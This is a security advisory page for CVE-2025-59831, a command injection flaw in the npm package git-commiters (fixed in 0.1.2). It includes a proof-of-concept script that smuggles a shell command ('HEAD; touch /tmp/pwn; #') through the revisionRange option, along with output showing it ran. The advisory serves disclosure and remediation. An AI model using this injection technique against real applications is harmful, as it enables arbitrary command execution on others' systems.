ghsa-g38c-wxjf-xrh6
Vulnerability from github
Published
2025-09-22 18:01
Modified
2025-09-26 16:29
Severity ?
8.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Summary
`git-comiters` Command Injection vulnerability
Details

Background on the vulnerability

This vulnerability manifests with the library's primary exported API: gitCommiters(options, callback) which allows specifying options such as cwd for current working directory and revisionRange as a revision pointer, such as HEAD.

However, the library does not sanitize for user input or practice secure process execution API to separate commands from their arguments and as such, uncontrolled user input is concatenated into command execution.

Exploit

  1. Install git-commiters@0.1.1 or earlier
  2. Initiaizlie a new Git directory with commits in it
  3. Create the following script in that directory:

```js var gitCommiters = require("git-commiters");

var options = { cwd: "./", revisionRange: "HEAD; touch /tmp/pwn; #", }; gitCommiters(options, function (err, result) { if (err) console.log(err); else console.log(result); }); ```

  1. Observe new file created on disk at /tmp/pwn

The git commiters functionality works as expected, too, despite the command execution, which further hinders the problem as it may not be apparent that a command injection occured on a running application.

```sh @lirantal ➜ /workspaces/git-commiters.js (master) $ node app.js [ { email: 'github@qslw.com', name: 'Morton Fox', deletions: 1, insertions: 1, commits: 1 }, { email: 'snowyu.lee@gmail.com', name: 'Riceball LEE', deletions: 11, insertions: 1198, commits: 7 } ]

@lirantal ➜ /workspaces/git-commiters.js (master) $ ls -alh /tmp/pwn -rw-r--rw- 1 codespace codespace 0 Jul 1 06:09 /tmp/pwn ```

Credit

Liran Tal

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "git-commiters"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59831"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-09-22T18:01:37Z",
    "nvd_published_at": "2025-09-25T14:15:46Z",
    "severity": "HIGH"
  },
  "details": "## Background on the vulnerability\n\nThis vulnerability manifests with the library\u0027s primary exported API: `gitCommiters(options, callback)`\nwhich allows specifying options such as `cwd` for current working directory and `revisionRange` as a revision pointer, such as `HEAD`.\n\nHowever, the library does not sanitize for user input or practice secure process execution API to separate commands from their arguments and as such, uncontrolled user input is concatenated into command execution.\n\n## Exploit\n\n1. Install `git-commiters@0.1.1` or earlier\n2. Initiaizlie a new Git directory with commits in it\n3. Create the following script in that directory:\n\n```js\nvar gitCommiters = require(\"git-commiters\");\n\nvar options = {\n  cwd: \"./\",\n  revisionRange: \"HEAD; touch /tmp/pwn; #\",\n};\ngitCommiters(options, function (err, result) {\n  if (err) console.log(err);\n  else console.log(result);\n});\n```\n\n3. Observe new file created on disk at `/tmp/pwn`\n\nThe git commiters functionality works as expected, too, despite the command execution, which further hinders the problem as it may not be apparent that a command injection occured on a running application.\n\n```sh\n@lirantal \u279c /workspaces/git-commiters.js (master) $ node app.js\n[\n  {\n    email: \u0027github@qslw.com\u0027,\n    name: \u0027Morton Fox\u0027,\n    deletions: 1,\n    insertions: 1,\n    commits: 1\n  },\n  {\n    email: \u0027snowyu.lee@gmail.com\u0027,\n    name: \u0027Riceball LEE\u0027,\n    deletions: 11,\n    insertions: 1198,\n    commits: 7\n  }\n]\n\n@lirantal \u279c /workspaces/git-commiters.js (master) $ ls -alh /tmp/pwn\n-rw-r--rw- 1 codespace codespace 0 Jul  1 06:09 /tmp/pwn\n```\n\n# Credit\n\nLiran Tal",
  "id": "GHSA-g38c-wxjf-xrh6",
  "modified": "2025-09-26T16:29:35Z",
  "published": "2025-09-22T18:01:37Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/snowyu/git-commiters.js/security/advisories/GHSA-g38c-wxjf-xrh6"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59831"
    },
    {
      "type": "WEB",
      "url": "https://github.com/snowyu/git-commiters.js/commit/7f0abfedbf506e3a61ac875d91324a8dbe756e84"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/snowyu/git-commiters.js"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "`git-comiters` Command Injection vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.